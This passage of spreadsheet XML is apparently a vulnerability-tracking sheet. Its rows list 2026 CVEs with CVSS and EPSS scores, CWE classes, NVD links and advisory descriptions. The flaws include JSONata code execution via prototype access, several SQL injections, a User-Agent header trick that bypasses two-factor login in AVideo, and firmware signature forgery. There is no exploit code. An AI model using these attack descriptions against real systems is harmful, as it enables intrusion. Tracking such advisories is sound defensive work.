      <c r="D488" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L488" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="M488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77413</t>
        </is>
      </c>
      <c r="C489" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D489" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E489" s="5" t="inlineStr"/>
      <c r="F489" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L489" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.</t>
        </is>
      </c>
      <c r="M489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77413</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77414</t>
        </is>
      </c>
      <c r="C490" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D490" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L490" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, the src/jsonata.js environment.lookup function used a bypassable hasOwnProperty check. Crafted expressions could use $hasOwnProperty, $spread, $string, prototype access, and $constructor to reach the object prototype and invoke process.getBuiltinModule with child_process, executing arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="M490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77414</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77415</t>
        </is>
      </c>
      <c r="C491" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D491" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E491" s="5" t="inlineStr"/>
      <c r="F491" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L491" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, crafted JSONata expressions could chain several object-integrity weaknesses to execute arbitrary code. The chain could overwrite $clone to mutate objects through evaluateTransformExpression, expose and deconstruct JSONata functions or lambdas through $merge.*, replace proc.arguments.forEach used by applyProcedure, and forge internal lambda state. These primitives allowed an attacker to reach prototype getters, prototype and constructor access, and process.getBuiltinModule with child_process, executing code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="M491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77415</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77642</t>
        </is>
      </c>
      <c r="C492" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D492" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E492" s="5" t="inlineStr"/>
      <c r="F492" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="I492" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L492" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to an out-of-bounds write when parsing a consensus or  detached signature with unexpected signature digest type. Impact  is minor for most Tor roles, but potentially major for directory   authorities. This is TROVE-2026-019.</t>
        </is>
      </c>
      <c r="M492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77642</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77644</t>
        </is>
      </c>
      <c r="C493" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D493" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E493" s="5" t="inlineStr"/>
      <c r="F493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-620</t>
        </is>
      </c>
      <c r="L493" s="5" t="inlineStr">
        <is>
          <t>A critical bypass access control vulnerability has been reported in PTC Windchill Risk and Reliability (WRR) Enterprise Edition.</t>
        </is>
      </c>
      <c r="M493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77644</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77776</t>
        </is>
      </c>
      <c r="C494" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D494" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E494" s="5" t="inlineStr"/>
      <c r="F494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G494" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L494" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy derives the memory owner from the x-headroom-user-id request header. The header is read directly at several points in headroom/proxy/handlers/openai.py, including the chat completion and websocket paths, and nothing binds the value to the caller. A client can therefore name another user's identifier and read or write that user's stored LLM memory. The fix introduces a single resolve_memory_identity seam in headroom/proxy/identity.py that honors the header only for loopback or allowlisted callers and otherwise binds the identity to the proxy-token fingerprint or the operating system user. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="M494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77776</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78012</t>
        </is>
      </c>
      <c r="C495" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D495" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L495" s="5" t="inlineStr">
        <is>
          <t>An issue in the NetStaX EtherNet/IP Stack prior to v5.6.1 could allow a large Class 3 explicit-message request to exceed the application-side receive buffer without generating an error or warning. The result could be memory corruption, a device crash, or a potential remote attack vector without the originating device receiving a CIP error indicating that the request could not be processed.</t>
        </is>
      </c>
      <c r="M495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78012</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78082</t>
        </is>
      </c>
      <c r="C496" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D496" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L496" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unauthenticated SQL Injection in Property Search and Map Filtering in SP Property &lt; 4.1.4 - The property search and listing query builders assembled several WHERE and ORDER BY clauses (zipcode, sorting, price_range_dropdown, and psize_range_dropdown) by directly concatenating raw request parameters into SQL strings without quoting or type casting. An unauthenticated remote attacker could execute boolean-based or time-based blind SQL injection to extract sensitive data from the database.</t>
        </is>
      </c>
      <c r="M496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78082</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78997</t>
        </is>
      </c>
      <c r="C497" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D497" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G497" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497" s="5" t="inlineStr">
        <is>
          <t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t>
        </is>
      </c>
      <c r="M497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79782</t>
        </is>
      </c>
      <c r="C498" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D498" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G498" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L498" s="5" t="inlineStr">
        <is>
          <t>rclone before 1.74.4 fails to strip the X-Amz-Security-Token header when an S3 redirect changes scheme from HTTPS to HTTP on the same host. Attackers can intercept plaintext HTTP traffic to capture AWS STS session tokens sent in request headers.</t>
        </is>
      </c>
      <c r="M498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79782</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80238</t>
        </is>
      </c>
      <c r="C499" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D499" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E499" s="5" t="inlineStr"/>
      <c r="F499" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G499" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L499" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. This vulnerability is considered critical because a low-privileged operator with SSH access to the SCG host can gain root-level access to the host without requiring a password by leveraging the exposed Docker socket. Additionally, an attacker who compromises a service running within the orchestrator container can access the same socket and escape the container boundary to obtain host-level control. Dell recommends that customers upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="M499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80238</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80428</t>
        </is>
      </c>
      <c r="C500" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D500" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L500" s="5" t="inlineStr">
        <is>
          <t>ILIAS before versions 9.22, 10.10, and 11.3 contains an unauthenticated PHP object injection vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting serialized objects through the LTI authentication endpoint and triggering deserialization via the Shibboleth back-channel logout endpoint. Attackers can write arbitrary serialized objects into session storage, then exploit an available POP gadget through the logout endpoint's unrestricted deserialization to write attacker-controlled PHP content to a web-accessible path and achieve remote code execution as the web server user.</t>
        </is>
      </c>
      <c r="M500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80428</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81800</t>
        </is>
      </c>
      <c r="C501" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D501" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="inlineStr"/>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L501" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in Verified Reviews (Avis Vérifiés) &lt;= 2.4.6 versions.</t>
        </is>
      </c>
      <c r="M501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81800</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82526</t>
        </is>
      </c>
      <c r="C502" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D502" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G502" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L502" s="5" t="inlineStr">
        <is>
          <t>R2R through 3.6.6 contains a stacked SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL statements by manipulating the index name parameter in the vector index creation endpoint. The index name is interpolated directly into a CREATE INDEX statement via string formatting without identifier quoting or allowlist validation, enabling arbitrary DDL and DML execution through semicolon-separated statements under the PostgreSQL superuser account.</t>
        </is>
      </c>
      <c r="M502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82526</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82854</t>
        </is>
      </c>
      <c r="C503" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D503" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L503" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 8.0.4 is vulnerable to SMTP command injection through the unsanitized envelope.size parameter. When an application passes a custom envelope object with a size property containing CRLF characters to sendMail(), the value is concatenated into the SMTP MAIL FROM command (as SIZE=...) without sanitization, allowing injection of arbitrary SMTP commands such as RCPT TO to silently add attacker-controlled recipients. Exploitation requires the application to expose the envelope size to attacker-controlled input, as Nodemailer does not include size in the default auto-constructed envelope.</t>
        </is>
      </c>
      <c r="M503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82854</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82859</t>
        </is>
      </c>
      <c r="C504" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D504" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E504" s="5" t="inlineStr"/>
      <c r="F504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L504" s="5" t="inlineStr">
        <is>
          <t>hulumi versions before v1.3.2 contain a deployment SCP template that allows tag-on-create bypasses for hulumi:iac-role protections. Attackers can bypass intended IAM boundary restrictions by exploiting the weakened SCP template in downstream deployments.</t>
        </is>
      </c>
      <c r="M504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82859</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82876</t>
        </is>
      </c>
      <c r="C505" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D505" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L505" s="5" t="inlineStr">
        <is>
          <t>Phison PS3111-S11 controller firmware verifies RSA signatures using a public modulus embedded within the firmware image itself rather than anchored in immutable storage. Attackers can generate arbitrary RSA key pairs, sign modified firmware with the private key, embed the matching modulus in the signature segment, and the controller accepts the tampered firmware as valid.</t>
        </is>
      </c>
      <c r="M505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82876</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8323</t>
        </is>
      </c>
      <c r="C506" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D506" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L506" s="5" t="inlineStr">
        <is>
          <t>URL redirection to untrusted site ('open redirect') vulnerability in Armiya Information Technologies Ltd. Co. Access Control System allows Fake the Source of Data.
This issue affects Access Control System: before Versiyon 2.</t>
        </is>
      </c>
      <c r="M506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8323</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84479</t>
        </is>
      </c>
      <c r="C507" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D507" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L507" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo (current e01e41ecc and earlier) makes three login-time security controls depend solely on the client-supplied User-Agent header. The isAVideoEncoder()/isAVideoMobileApp() checks match HTTP_USER_AGENT against a hardcoded literal ("AVideoEncoder"/"AVideoMobileApp") with no IP check or shared secret. An attacker who submits valid credentials and sets User-Agent: AVideoEncoder bypasses two-factor authentication, skips brute-force captcha escalation, and avoids being recorded in the login/device audit history. No patch is available at the time of publication.</t>
        </is>
      </c>
      <c r="M507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84479</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84480</t>
        </is>
      </c>
      <c r="C508" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D508" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L508" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to validate password recovery token expiration in userRecoverPassSave.json.php, allowing attackers to use expired tokens to reset account passwords indefinitely. Attackers who obtain a recovery token can use it at any time to change the target account's password and gain full account access.</t>
        </is>
      </c>
      <c r="M508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84480</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84695</t>
        </is>
      </c>
      <c r="C509" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D509" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L509" s="5" t="inlineStr">
        <is>
